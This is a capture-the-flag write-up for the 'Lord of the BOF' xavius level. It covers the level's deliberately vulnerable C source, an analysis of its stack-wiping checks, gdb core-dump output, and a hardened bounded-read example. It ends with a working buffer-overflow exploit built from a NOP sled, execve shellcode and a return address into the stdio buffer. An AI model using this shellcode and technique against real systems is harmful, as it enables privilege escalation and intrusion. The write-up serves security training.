[lob] nightmare -> xavius

2022. 9. 21. 19:45·Wargame/Hackerchool

1. intro


2. Code and analysis

2.1. C code

/*
        The Lord of the BOF : The Fellowship of the BOF
        - xavius
        - arg
*/

#include <stdio.h>
#include <stdlib.h>
#include <dumpcode.h>

main()
{
        char buffer[40];
        char *ret_addr;

        // overflow!
        fgets(buffer, 256, stdin);
        printf("%s\n", buffer);

        if(*(buffer+47) == '\xbf')
        {
                printf("stack retbayed you!\n");
                exit(0);
        }

        if(*(buffer+47) == '\x08')
        {
                printf("binary image retbayed you, too!!\n");
                exit(0);
        }

        // check if the ret_addr is library function or not
        memcpy(&ret_addr, buffer+44, 4);
        while(memcmp(ret_addr, "\x90\x90", 2) != 0)     // end point of function
        {
                if(*ret_addr == '\xc9'){                // leave
                        if(*(ret_addr+1) == '\xc3'){    // ret
                                printf("You cannot use library function!\n");
                                exit(0);
                        }
                }
                ret_addr++;
        }

        // stack destroyer
        memset(buffer, 0, 44);
        memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));

        // LD_* eraser
        // 40 : extra space for memset function
        memset(buffer-3000, 0, 3000-40);
}


2.2. Analysis

The top byte of the return address (buffer+47) may not be \xbf, and it may not be \x08 either.

It then reads the return address from buffer+44 and walks forward from it byte by byte until it hits \x90\x90; if it meets a leave; ret sequence (\xc9\xc3) on the way, it treats the address as a library function and exits.

After that it zeroes out the memory on both sides of the buffer: the first 44 bytes of the buffer, everything from buffer+48 up to 0xbfffffff, and 3000 bytes below the buffer (the LD_* eraser).
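The hardened counterpart of the read above, as an added example that is not part of the original writeup or of the LOB source: fgets is bounded by the real buffer size, and a constructed oversized line (like the 100-'A' test later in this post) shows that the slots behind the buffer stay untouched. read_line_bounded and demo_bounded_read are names assumed here.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 40   /* same buffer size as xavius */

/* Hardened counterpart of the xavius read: the length handed to fgets is the
 * real buffer size, so at most BUF_SIZE-1 bytes plus a NUL are ever written and
 * the saved ebp / return address behind the buffer cannot be reached.
 * Returns the number of bytes stored (newline stripped), or -1 on EOF/error. */
int read_line_bounded(char *buf, size_t size, FILE *in)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n')
        buf[--len] = '\0';
    return (int)len;
}

/* Push a constructed line of input_len 'A's (like the writeup's 100-'A' test)
 * through the bounded reader via a temporary file standing in for stdin.
 * The buffer is followed by an 8-byte sentinel in place of the saved ebp and
 * return address: returns -2 if any sentinel byte changed, otherwise the
 * number of bytes stored in the buffer. */
int demo_bounded_read(size_t input_len)
{
    char input[512];
    if (input_len > sizeof input - 2)
        return -1;
    memset(input, 'A', input_len);
    input[input_len] = '\n';

    FILE *in = tmpfile();
    if (in == NULL)
        return -1;
    fwrite(input, 1, input_len + 1, in);
    rewind(in);

    unsigned char frame[BUF_SIZE + 8];
    memset(frame, 0xee, sizeof frame);
    int n = read_line_bounded((char *)frame, BUF_SIZE, in);
    fclose(in);

    for (int i = 0; i < 8; i++)
        if (frame[BUF_SIZE + i] != 0xee)
            return -2;
    return n;
}
```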


3. Vulnerability check and attack preparation

3.1. Vulnerability

The return address can be overwritten: fgets reads up to 256 bytes into a 40-byte buffer.


3.2. Attack preparation

Everything has been wiped, so where am I supposed to put anything...?

Maybe just find a gadget somewhere and return to it...?

First I gave about a hundred A's as the argument and dug through the core file that was produced.

[nightmare@localhost nightmare]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./xaviua'.
Program terminated with signal 11, Segmentation fault.
#0  0x40077f72 in ?? ()
(gdb) x/40x 0x40077f72
0x40077f72:     Cannot access memory at address 0x40077f72
(gdb) x/x $ebp
0xbffffb18:     0x61616161
(gdb) x/x $eip
0x40077f72:     Cannot access memory at address 0x40077f72
(gdb) x/40x $esp
0xbffffad8:     0x4000ae60      0x080487a5      0x61616161      0x08048902
0xbffffae8:     0x00000002      0x61616161      0x61616161      0x61616161
0xbffffaf8:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffb08:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffb18:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffb28:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffb38:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffb48:     0x61616161      0x61616161      0x61616161      0x4000000a
0xbffffb58:     0xbffffb5c      0x40013e90      0x00000001      0xbffffc5a
0xbffffb68:     0x00000000      0xbffffc63      0xbffffc77      0xbffffc8f
(gdb) x/x  0x4000ae60
0x4000ae60:     Cannot access memory at address 0x4000ae60
(gdb) x/x  0x40013e90
0x40013e90:     0x00000000
(gdb) x/40x  0x40013e90
0x40013e90:     0x00000000      0x00000000      0x00000000      0x00000000
...
0x40014ff0:     0x00000000      0x00000000      0x00000000      0x00000000
0x40015000:     0x61616161      0x61616161      0x61616161      0x61616161
0x40015010:     0x61616161      0x61616161      0x61616161      0x61616161
0x40015020:     0x61616161      0x61616161      0x61616161      0x61616161
0x40015030:     0x61616161      0x61616161      0x61616161      0x61616161
0x40015040:     0x61616161      0x61616161      0x61616161      0x61616161
0x40015050:     0x61616161      0x61616161      0x61616161      0x61616161
0x40015060:     0x61616161      0x0000000a      0x00000000      0x00000000
0x40015070:     0x00000000      0x00000000      0x00000000      0x00000000

Oho.

I could see that the input values were sitting in some arbitrary region of memory.

I can just return there!


4. exploit

[nightmare@localhost nightmare]$ (python -c 'print "\x90"*(44-28) + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" + "\x00\x51\x01\x40"') | ./xaviua
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒�▒Phpassh/my-h/bin▒▒
                                      ̀
euid = 518
beg for me
[nightmare@localhost nightmare]$ (python -c 'print "\x90"*(44-28) + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" + "\x00\x51\x01\x40"') | ./xavius
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒�▒Phpassh/my-h/bin▒▒
                                      ̀
euid = 519
throw me away
License: Attribution-NonCommercial-NoDerivatives